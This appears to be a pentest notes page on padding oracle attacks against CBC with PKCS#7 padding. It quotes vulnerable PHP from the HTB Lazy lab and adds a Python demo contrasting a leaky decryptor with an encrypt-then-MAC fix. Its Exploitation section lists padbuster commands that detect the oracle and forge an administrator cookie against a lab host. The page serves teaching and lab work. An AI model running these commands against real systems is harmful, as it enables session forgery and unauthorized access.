Padding Oracle Attack

web, crypto, foothold

Overview #

CBC mode with PKCS#7 padding pads the plaintext up to a whole number of blocks before encryption.

An attacker can leverage this behaviour to recover the plaintext by manipulating the ciphertext byte by byte, in a trial-and-error fashion, and observing whether the application returns an error (invalid padding) or success (valid padding).

The cipher itself may be fine; the real attack surface is whether your app returns a distinguishable error on invalid padding, which gives an attacker the chance to brute-force the correct plaintext.

// example file from HTB Lazy (pkcs5_unpad() is not shown here; it returns false on malformed padding)
function decryptString($encryptedText, $passphrase) {
  $encrypted = base64_decode($encryptedText);
  $iv_size = mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_CBC);
  $iv = substr($encrypted, 0, $iv_size);          // the IV is prepended to the ciphertext
  $dec = mcrypt_decrypt(MCRYPT_DES, $passphrase, substr($encrypted, $iv_size), MCRYPT_MODE_CBC, $iv);
  $str = pkcs5_unpad($dec);
  if ($str === false) {
    echo "Invalid padding"; // really? you want to be hacked?
    die();                  // maybe let's replace that or
  }                         // remove entirely?
  else {
    return $str;
  }
}

This is also a type of CCA, or chosen-ciphertext attack.

Details on ciphertext manipulation #

Go to “The Theory” part of this link.
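The following is an added example (not from this page, not from the HTB Lazy source) that models the two decryptor shapes side by side: the leaky one above, which tells the caller when unpadding failed, and an encrypt-then-MAC version that rejects any tampered token with one uniform answer before the padding is ever inspected. It also shows the CBC property the manipulation relies on: changing a byte of one ciphertext block (or the IV) changes the same byte position of the next plaintext block. Assumptions: DES is replaced by a small HMAC-based Feistel cipher so the code runs on the Python standard library alone (the padding/CBC behaviour does not depend on the cipher), the 8-byte block size matches the DES example, the cookie value `user=guest` is a constructed sample, and all function names are this example's own.

```python
import hashlib
import hmac
import os

BLOCK = 8  # 8-byte blocks, the DES block size the PHP code above relies on

# Toy block cipher: a 4-round Feistel network with an HMAC-SHA256 round function.
# It stands in for DES so the example runs on the standard library alone; the
# CBC/PKCS#7 behaviour being demonstrated does not depend on the cipher inside.
def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, half: bytes, rnd: int) -> bytes:
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, right, rnd))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(4)):  # undo the rounds in reverse order
        left, right = _xor(right, _round(key, left, rnd)), left
    return left + right

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes):
    """Return the unpadded bytes, or None when the padding is malformed."""
    if not data or len(data) % BLOCK:
        return None
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        return None
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    # P[i] = D(C[i]) XOR C[i-1]: a byte changed in C[i-1] flips that byte of P[i]
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

# Vulnerable shape: IV || CBC ciphertext, and the caller learns whether unpadding failed.
def encrypt_token(key: bytes, plaintext: bytes) -> bytes:
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(key, iv, pkcs7_pad(plaintext))

def decrypt_oracle(key: bytes, token: bytes) -> str:
    """Same decision as decryptString(): two outcomes, both visible to the client."""
    plain = pkcs7_unpad(cbc_decrypt(key, token[:BLOCK], token[BLOCK:]))
    return "Invalid padding" if plain is None else "OK"

# Hardened shape: encrypt-then-MAC. The tag is checked in constant time before any
# decryption, so a tampered token gets one uniform failure and is never unpadded.
def encrypt_token_etm(key_enc: bytes, key_mac: bytes, plaintext: bytes) -> bytes:
    body = encrypt_token(key_enc, plaintext)
    return body + hmac.new(key_mac, body, hashlib.sha256).digest()

def decrypt_token_etm(key_enc: bytes, key_mac: bytes, token: bytes):
    body, tag = token[:-32], token[-32:]
    if not hmac.compare_digest(hmac.new(key_mac, body, hashlib.sha256).digest(), tag):
        return None  # the only answer a tampered token ever gets
    return pkcs7_unpad(cbc_decrypt(key_enc, body[:BLOCK], body[BLOCK:]))

def distinct_responses(respond, token: bytes, pos: int) -> set:
    """Replace token[pos] with every other value and collect the decryptor's answers.
    A padding oracle answers in two distinguishable ways; a hardened decryptor in one."""
    seen = set()
    for value in range(256):
        if value == token[pos]:
            continue  # skip the genuine token; only tampered ones are of interest
        tampered = bytearray(token)
        tampered[pos] = value
        seen.add(respond(bytes(tampered)))
    return seen

def demo() -> tuple:
    key_enc, key_mac = os.urandom(16), os.urandom(16)
    cookie = b"user=guest"  # constructed sample value
    token = encrypt_token(key_enc, cookie)
    token_etm = encrypt_token_etm(key_enc, key_mac, cookie)
    # tamper the last byte of the block that feeds the final block's XOR
    leaky = distinct_responses(lambda t: decrypt_oracle(key_enc, t), token, len(token) - BLOCK - 1)
    silent = distinct_responses(lambda t: decrypt_token_etm(key_enc, key_mac, t),
                                token_etm, len(token_etm) - 32 - BLOCK - 1)
    return leaky, silent

if __name__ == "__main__":
    leaky, silent = demo()
    print("padding-oracle decryptor answers:", sorted(leaky))
    print("encrypt-then-MAC decryptor answers:", list(silent))
```

Running it shows the leaky decryptor answering both `Invalid padding` and `OK` across the 255 tampered tokens (the `OK` cases are exactly the bit that the attack harvests), while the encrypt-then-MAC decryptor answers `None` for every one of them. The same uniform-failure property is what an AEAD mode such as AES-GCM gives you for free, which is the simpler fix when the library supports it.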

Detection #

Exploitation #

# installation
sudo apt-get install padbuster

# detection: <url> <sample ciphertext> <block size in bytes: 8 for DES> ; -encoding 0 = Base64
padbuster http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="

# gets an admin cookie (encrypts a chosen plaintext through the same oracle)
padbuster http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"

References #